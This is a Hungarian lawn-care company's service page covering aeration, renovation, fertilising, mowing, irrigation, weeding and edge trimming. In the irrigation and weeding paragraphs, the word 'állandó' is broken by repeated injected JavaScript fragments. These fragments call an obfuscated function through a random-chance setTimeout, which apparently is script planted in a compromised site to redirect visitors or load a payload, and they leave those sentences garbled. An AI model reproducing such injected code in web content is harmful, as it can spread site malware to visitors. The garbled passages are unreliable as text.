A fű tavasszal, áprilisban és májusban nő a legintenzívebben – ami egyrészről örvendetes, másrészről rendszeres feladatokat ad a kerttulajdonosoknak. Van, aki számára a pázsit ápolása kikapcsolódás, míg mások számára inkább nyűg. Az utóbbi kategóriába tartozó, és inkább csak a kert örömeit élvezni kívánó kerttulajdonosok figyelmébe ajánljuk gyepfelújítási szolgáltatásainkat.

Gyepszellőztetés

A talaj a rendszeres taposás és öntözés következtében idővel tömörré, levegőtlenné válik. A gyep talajfelszínhez közeli része az évek során megvastagodik, ez szintén nehezíti a levegőcserét, a víz és tápanyagok gyökerekhez jutását. A nem megfelelően karbantartott fű esetében ezt a kedvezőtlen állapotot jelezheti a mohásodás. Ráadásul, ha a levágott füvet nem gyűjtik össze, a nyesedék a nedvességtől összetapadva idővel egy nemezszerű réteget alkot, ami tovább ront a helyzeten.

Ezért fontos feladat a talajt levegőhöz, a gyökereket oxigénhez juttatni. Automata öntözőrendszer esetén – a folyamatos öntözés erőteljesebb talajtömörítő hatása miatt – különösen javasoljuk az évi egyszeri gyepszellőztetést, amelyet célszerű a tavaszi időszakban megtenni.

A gyepszellőztetés szakszerű elvégzését vállaljuk nagy teljesítményű, benzinmotoros gyepszellőztető géppel, amellyel nagyobb területeken is hatékony munkát tudunk végezni.

Felújításra szoruló pázsitok

Idővel a kezdetben legtökéletesebb pázsit állapota is romolhat, megjelennek a gyomok, néhol kikopik a fű, tövek halnak el, gombák, moha, durva szálú füvek terjedhetnek el benne… de ha mindent jól csinálunk, 12-15 év után – a fű természetes élettani folyamatai miatt – akkor is indokolttá válhat egy komolyabb beavatkozás, felújítás.

Gyepfelújítási programunk keretében megoldást kínálunk a problémás felületek szakszerű rendbetételére. Többnyire az alábbi feladatok elvégzése válik szükségessé, amelyeket előzetes felmérés, és a terület adottságainak figyelembe vételével végzünk el:

  • gyepszellőztetés
  • tápanyag utánpótlás
  • felülvetés
  • gyomlálás / gyomirtás
  • gyepszél vágás, igazítás

Ezt követően a kerttulajdonosnak a rendszeres, szakszerű ápolásra, valamint a megfelelő öntözésre és nyírásra kell odafigyelni a kívánt eredmény eléréséhez. Természetesen a későbbi, rendszeres, szakszerű fenntartás is megrendelhető tőlünk, de ingyenes szaktanácsadással is segítjük megbízóinkat.

Tápanyag-utánpótlás

Gyönyörű, egészséges és zöld pázsit kizárólag precíz tápanyag-utánpótlással tartható fenn. A rendszeres öntözés fontos, de önmagában kevés ehhez!

Tavasszal magas nitrogéntartalmú műtrágya kijuttatása javasolt, hogy a fű erőteljes növekedésnek induljon, és a színe is elképzeléseink szerint alakuljon. Az év folyamán még néhány alkalommal (kb. 1-2 havonta) kell megismételni a műtrágyázást. Ha ettől szeretnénk magunkat megkímélni, választhatunk szabályozott tápanyag-leadású, hosszú hatástartamú készítményeket is, amelyek több hónapra megoldják a nélkülözhetetlen elemek utánpótlását. Az év más szakaszaiban, például a tél beállta előtt viszont már más összetételű műtrágya kijuttatása válik szükségessé.

A műtrágya kiválasztásán kívül a kiszórása is körültekintést igényel – ellenkező esetben a fű különféle furcsa mintákat ölthet az egyenetlen növekedés miatt.

Az általunk forgalmazott műtrágyákról és kedvező tulajdonságaikról részletesebben tájékozódhat itt .

Fűnyírás

A rendszeresen nyírás elhanyagolhatatlan feladat minden igényes kert esetében (általában hetente kell/kellene sort keríteni rá), egyszerre legfeljebb a fű magasságának 1/3-át eltávolítva. Persze nem kell centiméterrel mérni, de ha mégis túl hosszúra hagytuk nőni, akkor sem indokolt egyszerre bepótolni a lemaradást: inkább fokozatosan csökkentsük a nyírási magasságot.

Öntözés

Hazánk éghajlati adottságai miatt öntözés nélkül nem tartható fenn igényes pázsit!

Ha a fű vízigényét a természetes csapadék nem biztosítja, öntözéssel kell pótolni. Az időigényes és fárasztó, állandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andó locsolás helyett javasoljuk az automata öntözőrendszer kiépítését, amely emberi beavatkozás nélkül, az időjárást és a növények igényeit figyelembe véve, folyamatosan biztosítja a szükséges mennyiségű vizet.

Az öntözőrendszerekről bővebben olvashat itt .

Gyomlálás és gyomirtás

Az állandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andó küzdelem a gyomok ellen sosem adható fel, de érdemes vállalni: kitartó munkával és - adott esetben - vegyszeres védekezéssel elérhető és fenntartható a gyommentes pázsit. A megjelenő gyomok jellege határozza meg a szükséges kezelést (mechanikai vagy vegyszeres beavatkozás, ez utóbbi esetében is többféle lehetőség létezik).

Gyepszélvágás

A gyepfelület - ha csak nem szabunk gátat a terjedésének valamilyen mesterséges szegéllyel - idővel oda is átnő, ahová eredetileg nem tervezték. Bármilyen szépen is van nyírva a fű, ha a szegélye rendetlen, az összhatás nem lesz tökéletes. Ezért szükség szerint el kell végezni a gyepszélek igazítását. Egyenes vonalvezetésű gyep esetén egy kifeszített zsinór, vagy deszka mellett, míg íves forma esetén a fűre fektetett és eligazított kötél mentén ásóval vághatók le, távolíthatók el a túlnőtt részek.